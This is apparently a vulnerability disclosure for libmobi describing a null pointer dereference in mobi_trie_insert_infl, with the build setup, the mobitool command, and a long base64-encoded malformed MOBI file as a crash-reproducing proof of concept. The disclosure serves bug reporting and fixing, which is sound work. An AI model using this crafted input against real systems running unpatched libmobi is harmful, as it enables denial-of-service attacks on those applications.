A null pointer reference in libmobi. in bfabiszewski/libmobi

Valid

Reported on

Apr 19th 2022


Description

The vulnerability at src/index.c#L 1054, function mobi_trie_insert_infl. At line 1063 shown as below, function mobi_get_)cncx_string_flat uses len as parameter, len got from t.tagvalues. While at line 1060, program doesn’t check the initial value of tagvalues_count, when the for loop begins with k=0, the program will get null pointer dereference.

Proof of Concept

environment: Ubuntu 16.04.5 LTS \n \l Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux libmobi: 0.9 (gcc 5.4.0 20160609) configure: export CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g -O2" ./configure --enable-tools-static cmd: ./tools/mobitool -e -o /tmp/ poc1 poc1: U3JpX1Zpc2hudV9TYWhhbXJhbmFhbWFtAAAAAAAAAAAAAAAAVigmYlYoxmMAT6oAAAAAAAAAAAAA AE8AQk9PS01PQkkAAO81AAAAAAAaAAABIAAAAAAAACNIAAAAAgAAI9oAAACnAAAj3AAAAAYAACTU AAAACAAAJcQAAAAKAAAmDAAAAAwAADYcAAAADgAANkAAAAAQAAA2dAAAABIAAEC3AAAAFAAARnsA AAAYAABGgwAAAJ4AAGirAAAAHAAAalMAAAADAABrSwAAACAAAGxLAAAAIgAAbIMAAAAkAABtdwAA ACYAAG6PAAAAKAAAb4sAAAAqAABwhwAAACwAAHDPAAAALgAAcPMAAAAwAABxJwAAADIAAHFDAAAA NAAAAAIAAAAAASEAARAAAAAAAE1PQkkAAAEIAAAAAgAAAAAAAAAAAAAAAAAAAH0AAAAAAAAAAP// /////////////////////8z///////////8AAAADAAACIAAAABAAAAAJAAAAZAAAAAAAAAAGAAAA BgAAAAAAAAAAAAAAAAAAAAAAACdQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD///// x////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAEABgAAAAEAAAAIAAAAAQAAAAcAAAABAAAAAAAAkgAA EgAJAAAAAv///////4L/FwAAAwAAAAP/Ff///////////////////////wAAAAD/////AAAAAEVY VEgAAAEIAAAADwCwAGoAAAASMjAxOC0wOC0wNwAAAh4AAAAMSG8weAAAAgwAAAAKZW4AAAINAAAA FWhvcml6b250YWyBbHIAAACBAAAAGWtpbmRsZTplbWJlZDowMDAxAAAAgwAAAAwAAAAAAAABLAAA ACwBAABpAAAAAAAAAAAAAACAAAAAAAAAAAAACwAAAAAAAPTt7L4AAADMAAAADAAAAMoAAADNAAAA DAAAANQAAADOAAAADAAAAAkAAAIXAAAAFDEwMjgtMDg5NzI5MgAAAM8AAAAMAAAAAAAAAiMAAAAQ SW5NZW1vcnkAAAB9AAAADAAAAAEAAAB5AAAADAAAAAwAAGxpYm1vYmkgbmN4IHRlc3Q+AAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAOIAAAAAAACjALQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAAAoA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAADSAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAjAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB/AAAAAAAAAAAAAAAAAAAAAAAAACgAAAAA ABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOYAAAAAAAAAAAAAACoAAAAAAAAA AAAAAEIAAAAAAAAAAMkAAAAAAAAAAAAAAAAAAAAAAAAAAEEAAAAAAAAAAAAAPgAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAP9/AAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAADNAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVAAAAAAA AIUAAAAAAAAAAABfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAywAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAACcAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB91AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAlQAAAAAAAAAAAAAAAOUAAAAAAAAQAAAAAAAAAFQAAAAA3QAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIAAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADvAAAA AAAAAAAAAAAAAAAAAADeAAAAAAAAAAAAAAAAAAAAAAAAKwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAACHAAAAAAAAAAAAAAAAAC8AFQAAAAAAAAAAAAAAAAAAAAAAAABNAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAD/4gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAADbAAAAAAAAAAAAADYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAYgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAE0AAAAA AAAAAAAAAAAAAACbAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJAAAAABGAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAHIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFMAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKwAAAAAAAAAAAAAAAAAAAJMAAAAAAAAAAAAAADEA AJ4AAAAAAAAAAAAAAAAAAAAAAOYAAAAAAAAAAAAAAAAAAAAAAPgAAAAAAAAAAAAAAAAAAAAAAAAA AAAAYwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnAAAAAAAAAAAAAAAAAAAA zQAAANUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ngAAAAA6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABNAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAC8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAH0AAAAAAAAAAAAAAAAAAAAAAAAAwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAABOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAGoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA XgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABUAACiAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAG4AAAAAAJcAAABBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsgAA AAAAAAAAAAAAAAAAAAAAAHwAAAAAAAAAAAAALQAAAAAAAAAAAPz///8AAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAADG+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAA6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACkAAAiAAAAAAAAAAAAAAAAAAAAAEAAAAAA AAAAAADVAAAAAAwAAAAAAAAAAABrAAAAAAAAAAAAAAAAsgAAAAAAAAAAAAAAAAAAAACDAAAAAAAA AAAAAAAAAAAAAAAAAADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOgAAAAAAAAAA AAAAzgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAL4AAAAAAAAAhQAAAAAAAADt AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB3AAAAAAAAAAAAAAAAegAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACaAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAA5AAAAAAAAAACCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYTsAAAAA AAAAAH4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAiAAAAAAAAAAAAAAAAAAA AAAAAAAAbQAAAAAAAAAAAAAAAAAAAAAAAAAAQQAAAAAAAAAAAAAAAN0AAAAAAAAA6wAAAAAAAAAA AAAAAAAAAHkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA rAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAyAAAAAAAAAAAAAAAAAAAAAAAAbwAAAAAAAAAAAAAAAAAAAAAAAACdAAAABAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACGAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAnAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAIYAAAAAnQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAI4AAAAAAAAAAAAAAAAAAAAAAFYAAAAAAOAAAKMA AAAAAAAAAAAAAAAAAAAAAAAAnQAAAAAAAAAAAAAAAAAAALcAAAAAAAAAAAAAAAC0AAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZwAAAAAAAAAABAAA AMIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAswAAAAAAAAAAAAAAAADMAADGAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAD0AAAAAAAAAnAAAAAAAAAAAAAAAAAAAAAAAAAAAmwAA7gAAAAAAAADm AAAAAAAA0gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAL4A AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASAAAAAAA AFYAAAAAAPYAAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAAAAne8AAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB2AAAASAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AJQAAAAAAJ0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAL0AAAAAAAAAAAAAAAAAAAAA AAAAAAAAAB4AAAAAAAAAAAAAAAAAAAAAAAAQAAAAADwAAACMAAAJAAAAAAAAAAAAtgAAAAAAAAAA vgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABFAAAA AAAAAAAAAAAAAAAAAAAAAADbAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ALsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlgAAAAAAAAAAAAAAAADZAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA JQAAAAAAAAAAAAAAAFUAAAAAAAAAAAAAAAAAAAAAAIcAAAAAAAAAAAAAAAAA+QAAAAAAAAAAwgAA AAAA3wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADCAAAA AAAAAAAAAAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABqAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMAAAAAAAAAAAAgAAAAAAAA AAAAAAAAAAAAAABfAAAAAAAAAAAAAAAAAAAAAAAAAAB3ALEAAAAAAAAAAAAAAAAAAAAAAAAABQAA AOlFAAAAAAAAAADRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAfAAAAAAAAAAAAAAAAAAAAAAAAFQAAALcA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoAAAAAAAAVQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANEAAI8KAACc AAAAAAAAAAAAAAAAADoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIIA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAiAAAAAAAAAAArgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAhAAAAJ4AAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAuQAAAAAAAAAAAAAAnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAmgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAANAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAABGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIsAAPcAAAAAAAAAAAAAAAAAAAAA AAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAC2AAAAAAAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAACxAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAK8AANYAAAAAAAD5AAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABkAAAAAAAAAAAAAAAAAAAA AIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQAAAAAAAAAAAHcAAAAAAAAAAAAAAF8AAAAAAAAA AAAAAHMAAAAAAAAAAAAJAAAAAAAAAAAAAAAAowAAAAAAAAAAAAAAAAAAAABnAAAAAAAAjwAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVAAAAAAAA AAAAAAAAAAAAowAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALgAAAAAAAAAA AAAAAAAAAAAAAAAAAAAALwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLAAAAAAAAAAAaAAAAAAAAAAAAAABbAAAAAAAAAAgA AAAAAAAAAAAAAAAAAAAAAADqAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADiAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAMcAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOQA AAAATAAAAAAAAEUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA jgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACZAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAIMAAAAAAAAAAAAALAAAAAAAAAAAAAAAAAAAAAAALAAAAAAAAAAAAAAAAAAA AAAAAAAAADgAAAAAAAAAAAAAAAAAAAAAAAAA7wAAAAAAAAAAAAAAAAAAAAAAdQAAAAAAAABqAAAA cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA9AAAAAAAAAAAAAAAAFkAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQAAAAAAAAAAAAArAAAlQAAAAAAAAAAAAAAAJ8AAAAA AAAAAAAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOQAAAAAAABDAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACFAAAAAAAA AAAAAAAAAAAAAAAAAADVAAAAAKwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF0AAAAAAAAAAAAAAAAA AAAAAAAAAACBAAAAAAAAAAAAAAAAAAAAmAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAE8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAeAAAAAAAAAAAAAAAAAAAAAAAiAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8aHRtbD48aGVhZD48Z3VpZGU+PC+ARYCzYm9keYEQ MT5UZXN042hhcHRlciAxgPgxPiA8cIC7cGFnZYChnT4gIDxtYnA6nYliiGWGay+B54HlqYHnGeaA oIHngec8aDIgg8tzdWKCBi2D8ZKD94PyM4PygY+Bj4GIg5mBj4V7NIV/hX+FeC+Hky+I2T4AhoAE hAAASU5EWAAAAMAAAAAAAAAAAAAAAAIAAADwAAAAAQCd/TT/////AAAABAAAAAAAAAAAAAAAAAAA AAEANAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAwAAAAAAAAAAAVEFHWAAAACwAAAABAQEBAAIBAgADAQQABAEIABUBEAAW AeAAFwFAAAAAAAEBMwAESURYVADsAABJTkRYAAAAwAAAAAAAAAABAAAAAIMAAOQAAAAE//////// //8AAAAAAG8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAjAAAAADRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMYAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAWAAAAAAAAAkAAAAAAAABMA+ovICAATFv5AG9 j4CCgwEyHwGgsZ6BgQEzHwHR0LKBgQBJRFhUAMAAxwDRANqOVONzdCBjaGEsdGVyIDGOVGVzdCBj aGFwdGVyIDKTVGVzdCBzdWJjaGFwdGVyIDItMZNUZXN0IHN1YmNoYeB0ZXIgMi0yAABSRVNDAAAA EAAAAAEAAAAYc2l6ZT1DRCZ2ZXJzaW9uPTEmdHlwZT0xPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNv ZG1uZz0idXRmLTgiP4s8bWV0YWRhdGEgeG1sbnM6b3BmPSJodHRwOi8vd3d3LmlkcGYub3JnLzIw MDcvb3BmIiB4bWxuczpkYz0iaHR0cDovL3B1cmwub3JnL6ZjL2VsZcplbnRzLzEuMS8iIHhtbG5z PSJodHRwOi8vd3d3LmlkcGYub3JnLzIwgTcvb3BmIj48bWV0YSBuYW1lPSJTaWdpbCB2ZXJzaZ9u ZCBjb250ZW50PSIwLjkuMTAiLz48L21ldGFkYXRhPjxzcGluZSB0b2M9ImdjeCI+PGl0ZW1yZWYg aWRyZWY9IlNlY3Rpb24wMDAxLnhodG1sIiBza2VsaWQ9IjAiLz5VaXRlbXJlZiBpZHJlZj0iU2Vj dGlvbjAwMDIueGh0bWwiILprZWxpZD0iMSIvPjxpdGVtcmVmIGlkcmVmPSJTZWN0aW9uMDAwMl8w 8DAxLnhodPZsIiBza2VsaWQ9IjIiLz48L3NwaW5lPgAAAAArAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAkgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAACFAAD9AAAAAAAAAAAAAAAAAAAAAAAAAAAxAAAAAAAAAAAAAAAA AAAAAAB0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAADRAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACIAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAABMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAMkAAAAAAAAAAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANUAAADfAAAA AAAAAAAAAAAAAAAAAADpAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAJwAAAAAAAAAAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAPwAAAAAAABwAACTAAAAAAAAFgAAAAAAAAAAAAAAAAAAAAC8AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMQAAAAAAAAAAAAAAAAAAK0AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACyAAAAAAAA AAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACIAAAAAAAAwgAAAAAAAAAAAAAAAAAAAAAAAAAAAJAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 